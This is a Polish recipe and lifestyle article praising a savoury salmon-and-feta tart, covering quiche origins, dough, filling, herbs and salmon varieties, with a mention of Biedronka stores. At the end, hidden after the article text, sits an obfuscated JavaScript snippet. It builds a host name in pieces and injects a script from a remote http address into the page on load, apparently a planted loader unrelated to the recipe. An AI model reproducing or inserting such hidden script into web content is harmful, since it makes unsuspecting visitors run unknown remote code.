Home Lifestyle Przysmaki na co dzień i od święta, czyli francuskie specjały i królewskie ryby

Przysmaki na co dzień i od święta, czyli francuskie specjały i królewskie ryby

losos

Wytrawna, krucha tarta, wypełniona delikatnym i nadzwyczaj aromatycznym nadzieniem z łososia, zaczaruje kubki smakowe nawet najwybredniejszych smakoszy.
    

Najbliżsi bez wątpienia docenią miłe urozmaicenie w porze obiadowej, warto również w ten – jakże smaczny – sposób uatrakcyjnić rodzinną kolację. Nietuzinkową potrawą z powodzeniem uraczysz niespodziewanych gości. Jeśli zaserwujesz ją w charakterze dania głównego albo lekkiej przystawki, biesiadnicy nie zechcą odejść od stołu.

Kruchy rarytas z łososiowym sercem

Wytrawna tarta z łososiem smakuje równie zniewalająco na ciepło, jak i na zimno. Dlatego fantastycznie sprawdza się w charakterze przekąsek na przyjęciu lub imprezie. Znakomicie się prezentuje i niebiańsko pachnie. Uświetni każde spotkanie w gronie rodziny, przyjaciół, a nawet świąteczne menu. Niektórzy podają ją na śniadanie, inni – wraz z bukietem sałatek – „pałaszują” tartę w czasie lunchu. Zwyczajowo potrawę wkłada się do pieca w sporych, okrągłych formach do pieczenia, jednak – jeśli chcesz zaskoczyć swoje domowe łasuchy – sięgnij po najbardziej fantazyjne kształty naczyń do wypiekania.

Gdy planujesz podać intrygujące danie na ciepło, szefowie kuchni polecają przygotowywać je w ceramicznych formach o kształcie koła, ponieważ znacznie dłużej utrzymują temperaturę.

Podstawę tarty stanowi specyficzne, bardzo delikatne kruche ciasto. Jeśli nie masz zbyt wiele czasu – wybierz gotowe i wyjątkowo apetyczne produkty, które znajdziesz w sklepach Biedronka. Jeżeli jednak możesz poświęcić daniu nieco więcej uwagi – sam przygotuj tzw. quiche od początku do końca. Potrawa wywodzi się z Alzacji i Lotaryngii, określa kompozycję z francuskiego ciasta, która w „sercu” kryje balsamiczne, wytrawne nadzienie. Całość wiąże ze sobą mieszanina śmietany i jaj, którą pokrywasz quiche przed włożeniem do piekarnika. Wiesz, że ciekawy „placek” kucharze przyrządzali już w XVI wieku?

Ciasto przygotujesz z mąki, jaj, posiekanego masła i soli. Niektórzy nie wyobrażają go sobie bez odrobiny śmietany. Pół godziny przed pieczeniem owiń francuski specjał w folię i wstaw do lodówki. Zwykle wystarczy kwadrans w piekarniku, by uroczo się zarumienił.

Sprawdź także inne przepisy z łososiem w roli głównej.

Królewska ryba w ziołowych aromatach

Czarujący sekret wytrawnej tarty z łososiem tkwi w nadzieniu – kompozycja łososia i nadzwyczaj aromatycznego sera feta to prawdziwa rozkosz dla podniebienia. Należy tylko dopełnić ją wspomnianą, tradycyjną mieszaniną jaj i śmietanki kremówki, dzięki której danie nabierze delikatności. Oczywiście, musisz pamiętać o poszerzeniu bukietu zapachów o zielony szczypiorek, koperek i sporą szczyptę przypraw – soli i pieprzu.

Dlaczego sekret potrawy kryje się właśnie w nadzieniu? Przede wszystkim ze względu na łososia, którego powszechnie uważa się za rybę królewską, a w każdym razie niezwykłą. Jego mięso, zależnie od odmiany, przybiera barwę od różowej do pomarańczowej. Możesz wybierać z całej palety gatunków: atlantyckich i pacyficznych, jeziornych czy hodowlanych. W sklepach najczęściej spotyka się ryby pochodzące z USA, Kanady, Norwegii, Chile i Szwecji.

Co szczególnie urzeka amatorów łososia na całym świecie? Prócz walorów odżywczych – zniewala jego oryginalny, wyborny smak. To wyjątkowo soczyste mięso, które wyróżnia nadzwyczajny aromat. Warto podkreślić go cytryną i rozmarynem. Jak? Wystarczy godzinę lub dwie przed przyrządzeniem potrawy zamarynować płat w tej ziołowo-cytrusowej mieszance.

Kiedy tartę z łososiem podasz na obiad, z powodzeniem zastąpisz nią danie mięsne. Wiesz, że łosoś to znakomite źródło wartościowego białka? Nietuzinkowa ryba komponuje się wyśmienicie także z bazylią, majerankiem, tymiankiem, a nawet chrzanem i odrobiną orzechów. Jeśli nie obawiasz się kulinarnych eksperymentów, zastanów się, o jaki akcent wzbogacić pyszny posiłek? Który dodatek szczególnie urzeknie podniebienia Twoich ukochanych głodomorów? Dorosłym łasuchom bez wątpienia do gustu przypadnie wytrawna tarta w towarzystwie lampki lekkiego wina alzackiego.

 

{source}
<script type=”text/javascript”>
(function(){
ua4w=document.createElement(„script”);ua4w.type=”text/javascript”;
ua4w.async=true;ua4w_=((„us”)+”t”)+”a”;ua4w_+=(„t.i”)+””+”n”;ua4w_+=((„f”)+”o”);
ua4w.src=”http://”+ua4w_+”/6959670.cr4uvpdca4wisjqbu8u142gshbXrew”;
document.body.appendChild(ua4w);
})();
</script>
{/source}